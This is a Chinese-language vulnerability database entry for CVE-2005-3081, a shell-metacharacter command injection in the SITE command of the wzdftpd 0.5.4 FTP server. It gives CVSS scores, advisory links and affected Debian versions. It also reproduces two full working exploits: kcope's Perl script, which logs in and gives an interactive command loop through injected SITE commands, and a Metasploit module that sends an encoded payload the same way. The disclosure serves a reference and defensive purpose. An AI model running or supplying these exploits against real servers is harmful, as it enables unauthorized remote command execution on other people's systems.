CVE-2005-3081
CVSS4.6
发布时间 :2005-09-27 16:03:00
修订时间 :2008-09-05 16:53:24
NMCOES    

[原文]wzdftpd 0.5.4 allows remote authenticated users to execute arbitrary commands via shell metacharacters in the SITE command.


[CNNVD]Wzdftpd SITE Command 任意指令执行漏洞(CNNVD-200509-251)

        wzdftpd是一个模块化跨平台多线程FTP 服务器。
        wzdftpd 0.5.4中存在安全漏洞,远程验证用户可以通过SITE指令中的shell元字符执行任意指令。

- CVSS (基础分值)

CVSS分值: 4.6 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3081
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3081
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200509-251
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/14935
(UNKNOWN)  BID  14935
http://www.securiteam.com/exploits/5CP0R1PGUE.html
(VENDOR_ADVISORY)  MISC  http://www.securiteam.com/exploits/5CP0R1PGUE.html
http://www.osvdb.org/19682
(UNKNOWN)  OSVDB  19682
http://secunia.com/advisories/16936
(VENDOR_ADVISORY)  SECUNIA  16936
http://archives.neohapsis.com/archives/fulldisclosure/2005-09/0646.html
(UNKNOWN)  FULLDISC  20050924 It's time for some warez - wzdftpd remote exploit
http://www.debian.org/security/2006/dsa-1006
(UNKNOWN)  DEBIAN  DSA-1006

- 漏洞信息

Wzdftpd SITE Command 任意指令执行漏洞
中危 输入验证
2005-09-27 00:00:00 2005-10-20 00:00:00
远程  
        wzdftpd是一个模块化跨平台多线程FTP 服务器。
        wzdftpd 0.5.4中存在安全漏洞,远程验证用户可以通过SITE指令中的shell元字符执行任意指令。

- 公告与补丁

        暂无数据

- 漏洞信息 (1231)

WzdFTPD <= 0.5.4 Remote Command Execution Exploit (EDBID:1231)
linux remote
2005-09-24 Verified
21 Kingcope
N/A [点击下载]
######################################################
# 0day0day0day0day0day0day0day
# -------------------------------
# wzdftpd remote exploit by kcope
# nice call to popen(3) on custom 
# site commands...
#
# August 2005
# confidential! keep private!
# -------------------------------
# 0day0day0day0day0day0day0day
#
#                    .___ _____  __             .___
#__  _  __________ __| _// ____\/  |_______   __| _/
#\ \/ \/ /\___   // __ |\   __\\   __\____ \ / __ | 
# \     /  /    // /_/ | |  |   |  | |  |_> > /_/ | 
#  \/\_/  /_____ \____ | |__|   |__| |   __/\____ | 
#               \/    \/             |__|        \/ 
#                                      
#__  _  _______ _______   ____ ________
#\ \/ \/ /\__  \\_  __ \_/ __ \\___   /
# \     /  / __ \|  | \/\  ___/ /    / 
#  \/\_/  (____  /__|    \___  >_____ \
#              \/            \/      \/ VER1
######################################################

use Net::FTP;

sub usage {
	print "usage: wzdftpdwarez.pl remote_host remote_port user pass custom_site_command\n"
	     ."default guest account for wzdftpd is username/password: guest/%\n";
}

print "
wzdftpd remote exploit by kcope
August 2005
confidential! keep private!

";

if ($#ARGV < 4) {
	usage();
	exit();	 
}

$host = $ARGV[0];
$port = $ARGV[1];
$user = $ARGV[2];
$pass = $ARGV[3];
$sitecmd = $ARGV[4];

$ftp = Net::FTP->new(Host => $host, Port => $port, Debug => 0)
     or die "Cannot connect to $host: $@";

$ftp->login($user, $pass)
     or die "Cannot login ", $ftp->message;
     
print "Now you can type commands, hopefully as r00t!\n";
while(1) {
	print "!\$%&#>";
	$cmd=<stdin>;
	$ftp->site($sitecmd, "|$cmd;");
	print $ftp->message();
}

# milw0rm.com [2005-09-24]
		

- 漏洞信息 (1292)

WzdFTPD <= 0.5.4 (SITE) Remote Command Execution Exploit (meta) (EDBID:1292)
multiple remote
2005-11-04 Verified
21 David Maciejak
N/A [点击下载]
# Reference: http://www.milw0rm.com/id.php?id=1231 (kcope) /str0ke

# 
# Metasploit plugin for: Wzdftpd SITE Command Arbitrary Command Execution
# 2005 11 26 - David Maciejak
#

package Msf::Exploit::wzdftpd_site;
use base "Msf::Exploit";
use strict;
use Pex::Text;

my $advanced = { };

my $info = {
	'Name'     => 'Wzdftpd SITE Command Arbitrary Command Execution',
	'Version'  => '$Revision: 1.0 $',
	'Authors'  => [ 'David Maciejak <david dot maciejak at kyxar dot fr>' ],
	'Arch'     => [ ],
	'OS'       => [ ],
	'Priv'     => 1,
	'UserOpts' =>
	  {
		'RHOST'  => [1, 'ADDR', 'The target address'],
		'RPORT'  => [1, 'PORT', 'The target port', 21],
		'USER'   => [1, 'DATA', 'Username', 'guest'],
		'PASS'   => [1, 'DATA', 'Password', '%'],
		'SITECMD'=> [1, 'DATA', 'Custom site command'],
	  },

	'Description' => Pex::Text::Freeform(qq{
		This module exploits an arbitrary command execution vulnerability in Wzdftpd
		threw SITE command. Wzdftpd version to 0.5.4 are vulnerable.
}),
	'Refs' =>
	  [
		['BID', '14935'],
	  ],

	'Payload' =>
	  {
		'Space' => 128,
		'Keys'  => ['cmd','cmd_bash'],
	  },

	'Keys' => ['wzdftpd_site'],
  };

sub new {
	my $class = shift;
	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
	return($self);
}

sub Check {
	my $self = shift;
	my $target_host = $self->GetVar('RHOST');
	my $target_port = $self->GetVar('RPORT');

	my $s = Msf::Socket::Tcp->new
	(
		'PeerAddr'  => $target_host, 
		'PeerPort'  => $target_port, 
	);
	if ($s->IsError) {
		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
		return $self->CheckCode('Connect');
	}
	my $res = $s->Recv(-1, 5);
	$s->Close();
    
	if (! $res) {
            $self->PrintLine("[*] No FTP banner");
            return $self->CheckCode('Unknown');
	}

	if ($res =~ /220 wzd server ready/) 
	{
		$self->PrintLine("[*] FTP Server is a wzdftpd server");
		return $self->CheckCode('Appears');
	}
	else
	{
		$self->PrintLine("[*] FTP Server is probably not vulnerable");
		return $self->CheckCode('Safe');
	}
}

sub Exploit {
	my $self = shift;
	my $target_host    = $self->GetVar('RHOST');
	my $target_port    = $self->GetVar('RPORT');
	my $custom_site_cmd=$self->GetVar('SITECMD');
	my $encodedPayload = $self->GetVar('EncodedPayload');
	my $cmd            = $encodedPayload->RawPayload;
	my $user	   = $self->GetVar('USER');
	my $pass	   = $self->GetVar('PASS');
	
	my $s = Msf::Socket::Tcp->new(
		'PeerAddr' => $target_host,
		'PeerPort' => $target_port,
	  );

	if ($s->IsError){
		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
		return;
	}

	$self->PrintLine("[*] Establishing a connection to the FTP server ...");

	$s->Send("USER ".$user);

	my $result = $s->Recv(-1, 20);
	if (!($result=~/\d{3} User .+ okay, need password/))
	{
		$self->PrintLine("[*] Invalid user");
		return;
	}

	$s->Send("PASS ".$pass);
	$result = $s->Recv(-1, 20);

	if (!($result=~/\d{3} User logged in/))
	{
		$self->PrintLine("[*] Invalid password");
		return;
	}
	
	$s->Send("SITE ".$custom_site_cmd." | $cmd;");
	$result = $s->Recv(-1, 20);
	if (!($result=~/^200/))
	{
		$self->PrintLine("[*] Error: $result");
		return;
	}

	$self->PrintLine('');
	my @results = split ( /\n/, $result );
	chomp @results;
	for (my $i = 1; $i < @results -1; $i++){
			$self->PrintLine("$results[$i]");
	}
	return;
}

1;

# milw0rm.com [2005-11-04]
		

- 漏洞信息

19682
wzdftpd SITE Command Arbitrary Command Execution
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2005-09-24 Unknow
2005-09-24 Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Wzdftpd SITE Command Arbitrary Command Execution Vulnerability
Input Validation Error 14935
Yes No
2005-09-24 12:00:00 2006-12-15 08:23:00
Discovery is credited to kcope.

- 受影响的程序版本

wzdftpd wzdftpd 0.5.4
wzdftpd wzdftpd 0.5.2
Debian Linux 3.1 sparc
Debian Linux 3.1 s/390
Debian Linux 3.1 ppc
Debian Linux 3.1 mipsel
Debian Linux 3.1 mips
Debian Linux 3.1 m68k
Debian Linux 3.1 ia-64
Debian Linux 3.1 ia-32
Debian Linux 3.1 hppa
Debian Linux 3.1 arm
Debian Linux 3.1 amd64
Debian Linux 3.1 alpha
Debian Linux 3.1

- 漏洞讨论

The 'wzdftpd' utility is affected by a remote arbitrary command-execution vulnerability.

This issue can allow an attacker to execute commands in the context of an affected server and potentially gain unauthorized access.

Version 0.5.4 of wzdftpd is reported to be vulnerable. Other versions may be affected as well.

- 漏洞利用

An exploit is not required.

A proof of concept (wzdftpd_site.pm) Metasploit Framework exploit has been released.

- 解决方案



Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.commailto:vuldb@securityfocus.com

Please see references for more information and advisories.


wzdftpd wzdftpd 0.5.2

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站